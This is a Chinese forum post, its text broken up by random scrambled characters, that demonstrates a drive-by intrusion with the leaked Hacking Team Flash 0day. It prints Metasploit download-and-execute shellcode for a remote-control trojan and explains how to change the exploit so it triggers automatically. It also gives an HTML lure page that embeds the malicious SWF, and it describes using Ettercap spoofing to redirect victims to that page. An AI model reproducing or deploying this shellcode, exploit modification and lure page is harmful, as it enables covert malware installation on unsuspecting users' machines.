flash 0day之手工代码修改制作下载者实例入侵演示

admin · 发表于 2018-10-20 20:28:55

7 S" k+ i7 Q0 }5 a) T- J 三、flash 0day之手工代码修改制作下载者实例入侵演示 & Q( h8 ~ M! p

# s2 c3 r' z" n) \ 利用到的工具： * F! \5 F1 x; e8 U* n

, |6 ~/ C8 i( V& g3 q8 M% v Msf . r! _/ \8 [9 w0 Q8 n* }* j

; M M' z0 W* u! d+ n$ K Ettercap ; c& [) d1 O/ v! O; c" M& o

- S' a$ v2 U7 {' _% s$ R s# E Adobe Flash CS6 4 C+ u! u, m; R/ D( a3 W, T

Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 7 U; c& t, f" f+ P! j

+ E# G! u/ j* Z4 e$ Z2 x( X$ f0 r 下面我们就开始演示入侵，利用msf生成shellcode,首先打开msf执行use windows/download_exec，show options ( x7 L+ v& F0 }7 _

9 @0 ?7 Q1 I5 o$ _: w4 C1 V6 R 如图： ! Z2 V3 n" t# x+ m

, W% Q" \& q# @2 n! B ; C, W% Q! b2 ] o3 F* G+ W

( I" z2 E2 d1 Y5 E . x) C5 X( T, e. F a5 ^6 Z

' ^8 ] w9 D5 [+ @9 U6 H4 n9 \4 P 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址，这里我们用远控马，远控配置使用不再详细说明。。。如图: ' i ?8 M9 I6 C

. ~5 x3 P! h' w$ D k5 ]" T ' k! J" B1 o' E

1 H# ~1 O) Y3 F* ~# z `/ {8 A N) b r1 R

* k; O. U- Y7 y4 b 然后执行generate -t dword生成shellcode，如下： * V3 B& C# @9 |! _

% i7 N* }7 @4 p8 B1 z: y % O5 U2 F5 W! H! n1 J8 `

) F9 y# w, O. e% i5 N 复制代码到文本下便于我们一会编辑flash exp，如下： 9 @, y: h) L( ~$ w0 p

; }7 _; ]: B; C, e5 {/ x 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 8 j9 A5 w) b* B! T

3 R3 \& V$ z8 O# `: z1 A. ? 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0, ' _; f: V, ^- ^4 E1 {" y; t

9 _1 `' x [+ z g" U7 {7 |: H# c 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ! T6 O/ r7 H; [$ I+ e) R

) G( A5 H$ i F 0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, / a' {% O# I: Z8 e: p& P1 F

) | S7 K. R+ H' Q" O: R8 e 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854, `. R) ]9 T% c o2 R. |. P+ L

& ^# _0 I$ `4 \0 C3 K9 j. W8 c 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, ; M8 E( c- `8 B6 \6 P9 [

$ ?' u* c) ]6 p! Y 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, : i8 l" q. x! B6 y# E, d7 ]

# U2 I3 t5 d; z+ R* ]9 T5 w 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 8 c* C- g3 X" [; y

7 t) g/ R& }0 s. b 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, 6 P% J2 C/ ]0 c7 E- @ H

( d L/ a" f4 m: S4 l6 G2 S 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, 6 \3 `, D3 L( p) h( Q5 K, ]

3 f; W5 F: T7 K4 u1 |9 }4 c, | 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 9 \- ]9 h1 [8 F" q. p# }

0 D5 y! {' s. {8 O G( ]; |5 X 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, ' d7 d0 b4 q" p9 a% N4 L# e: g

3 J/ g4 q& d# u; J) D7 q C8 { 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, d/ y7 l* M! D

$ F9 k' [; a( T1 s 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % T. M) p- J3 }6 n

( t- ?9 D( d6 ?8 |4 z& G & v7 }) ~% M+ i+ F5 ]

- ?6 ~1 }6 J; ]# A1 T8 ] 7 P: z3 r# |; M5 i6 u* |

E+ G4 |. a+ g2 r0 Q3 m 下面我们来修改flash 0day exp，需要修改三个文件，分别为： + F3 c1 E+ ~; h5 |' F, `

" E0 c0 o5 W+ A9 d! ~ 5 V) a- n2 w8 s3 V

6 `8 h P& w4 Y' @- H# V 先修改ShellWin32.as，部分源代码如图： 0 Y1 D) g& p9 G$ E3 W7 S) w' a. F

( b8 d# n1 i/ j. q* H. I P6 H , n- ?* g7 g) f# o* y$ e5 @

& G/ E6 j2 V9 W; R- Y 我们需要把标记处[]中的代码改成用msf生成的代码，修改后如下： 0 n1 P1 S" N8 ~7 q

" s8 c4 |2 S# n8 Q " A/ Q0 _2 j) G+ V

0 u" O% t1 J8 m- T l 然后保存，ShellWin64.as的修改方法如上述，不再演示，下面我们来修改myclass.as,这里需要说明一下，因为此exp生成的利用程序，不能直接自动触发flash漏洞，也就是需要点击按钮才可以，实际上在做渗透的时候需要把它搞得更完美，所以就需要修改，修改方法：搜索myclass的某个字符doc.addchild(btn);如图： 5 F6 d: Y- N i p+ L. l

- E8 n& [ m' N & o( [5 ^8 a) B+ d" _

2 I @1 _: e, n0 |. c0 c- {/ M1 r 换行在后面加一句TryExpl();注意是l不是数字1，然后如图： z3 C; @( ^) `4 V

" V9 g3 p/ L7 i ; O5 `2 D$ k8 ]

9 G) Y) h. y; {* C# G/ l* J 9 \8 l. z2 Q) x& V

' {6 d t7 D: X4 E, q $ o6 h8 j" F" y

2 u/ A, O( N3 g4 |, R! |( D 然后点保存，下面我们来编译一下，打开 & N& J, }# a% c

) L! i7 d! ?9 v& Q' |8 q exp1.fla然后点文件-发布，看看编译没错误 ! p$ k+ ^/ w" \' \7 `2 o+ D

4 h1 W) i" A3 j7 P2 R* h. O2 d , V/ B1 @- V. x

6 G9 f# k5 u, F2 X: ?/ ]. N # l: h1 ~/ k, t/ P0 A) _' T

7 N' F! D. z: {5 z' G) ^ 1 v4 I7 S, y9 F1 p; v

! i) @9 W; Z/ O4 r4 B& v4 v0 l# ` - N/ ~: Q: c% P3 }! x" C( |

& A1 L1 @0 s0 ^7 t- {' T; s8 s6 e0 i 然后我们把生成的 5 h0 {9 v+ |3 }" J8 J% W6 n& d. A( H3 r

6 {6 ]4 x# Q% C: W: P exp1.swf丢到kailinux 的/var/www/html下： 8 J7 r, S' X2 v0 l i6 \4 e! X

! g! A. R0 X% ?$ L 然后把这段代码好好编辑一下 # @- C+ S7 K ~! m" m

2 }% L1 g+ g( D0 f 2 \7 r! e- f% y' ~# G) |9 `) Z

2 F0 o$ e# _* [( [7 [4 H7 \ ) f5 l+ `) Z1 a% p5 V3 J; S3 J

7 z% D; H& J( e& ~3 R% @) U8 X - F4 ^& P9 p& [$ u

: }; \7 t" s S" ~ # p$ R- a2 b7 A+ c9 `- ]& i4 a

8 h( B1 I- d1 {# q" P , }0 k& e2 v9 i1 b5 m# A4 h$ c8 z

- n- u; o: M& J2 K- n7 M; n/ Y + ?( P- h$ @: ]- M" q6 T6 [, \( h4 P1 Y

; `6 X) Y- C7 i <!DOCTYPE html> 8 s6 e( l2 L) s1 y g" _0 z

- ?7 Z% ~" n- @: t. b) N <html> - K7 |; y% B* D- r7 T+ O

8 z/ o2 l, C% z2 F/ ~% p. M <head> * [) t) x8 g& H, W; D7 _5 P! R. s

/ ~2 Q$ c1 a3 ?+ R: O T& } <meta http-equiv="Content-Type" content="text/html; : y) o+ ^! }# u: k

0 I, u0 h' O4 F9 M- M" C4 I charset=utf-8"/> - i, Q: p7 i9 `5 S0 I

( w2 w) y+ Z2 j! N7 B# Z( t8 v4 \ </head> $ V4 {; p2 T/ `9 |4 [

0 c" l; X8 r3 B$ J! i7 V0 V& F <body> 7 h# i, T3 |9 m4 E- H8 W

J8 H: y# w4 c/ v6 W <h2> Please wait, the requested page is loading...</h2> ; n, ^' a- b: B1 D: U5 G

$ j+ E ?7 S q! ~- I f0 o2 q S <br> 6 }: D/ A% F$ m* C: j, b

; H T% s1 a2 Q6 S$ q0 N0 `- X2 N <OBJECT - M, i e' |7 j1 t: Y ~# W7 p

. g) I9 x% O. @ e# u+ c classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie - S' n% V4 V) ~) A/ L

( p: d$ A- B' w8 a% c VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ; ~# m3 P7 n* u& U/ y$ \, ?

* I5 f8 |# W2 u! u! v </body> : \; F9 @0 f- p! F+ B# d" ?

( {) \4 f. w. Q ~2 u <script> ; i' K% K8 i5 `+ [

0 `4 M3 W1 h: A4 D( ]& G setTimeout(function () { 5 ?2 c3 l3 o1 L- L2 X

. G. k. F" w0 J1 S- S- z* S( Y 3 m; U% `; K+ ~* c6 }

! n( u3 A- d1 J. x) L( q! I3 b6 a window.location.reload(); + ^8 a, S* O) D) T

& ?3 }9 {0 F2 ]9 T3 L* [1 I8 f }, 10000); # w c, Q6 h- b9 k3 |8 w

+ F5 s# o9 |" {1 Q' C8 C' t - M3 p1 h' U. o) ^

4 T# ^ w. `- r6 q: n& Z3 U2 Z4 n </script> 6 q% ]7 f4 l7 z& D

$ p% A" c! D8 T! M- X3 g: _; _) O </html> 1 ~3 y7 ?0 g- T; _ e! ?0 u

m! m ^5 u, I5 v4 B+ j 9 q3 Y8 H. j0 _8 t2 v% e }

+ Y$ r l3 w, v3 T 注意：192.168.0.109是kali的ip地址，这时候我们需要service apache2 start启动一下web服务，然后将上面的html保存为index.htm同样丢到kali web目录下，测试访问链接存在如图： 8 D9 v0 U. G9 G( L9 b

8 [; q: j5 p) B / L) J2 S( y+ d: d" v6 g4 w

# F' D& v" d# Q3 A5 U G& O 7 l5 p$ a* ^6 |

" v/ s% H0 q x0 _+ ]( Z 9 W* }4 n% u: ?9 h

) ?) S( i+ c9 ^6 q 2 t6 d+ _" i0 }. T

# t- `- a* \: m8 D( P 3 a" ~, V5 W3 W9 K

' R1 W8 o0 R0 D& j0 M3 F3 H" p 下面我们用ettercap欺骗如图： 1 }3 q1 Q F1 d. k8 @# {. D0 G

: E H6 `2 K+ Z ! \- r: w8 @, |; V+ z! l

, h" W3 ~2 b: U6 j2 b; ?7 d 4 D: S9 G6 |+ r* Q

0 P. J/ D. H: w2 O2 T) K 下面我们随便访问个网站看看： ! w4 ], ]6 Z# E; H" y

# J7 p0 D7 q! x3 {1 u. z 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功，如图： + m% r$ n/ M! U5 @$ X; i) S2 R t

- o3 A: ~1 w# v* p& @! ^ 0 a) O( I% C. ~5 M% I

- H" v% p$ G) }, k 我们看另一台， 3 S4 g4 {: W9 d2 N# j6 d$ q0 Z

) D6 }9 r% I* u# A/ E ?5 J 提示这个错误，说明木马是成功被下载执行了，只是由于某些原因没上线而已。。。 9 G, o5 a9 ~" N

		自动登录	找回密码
密码			立即注册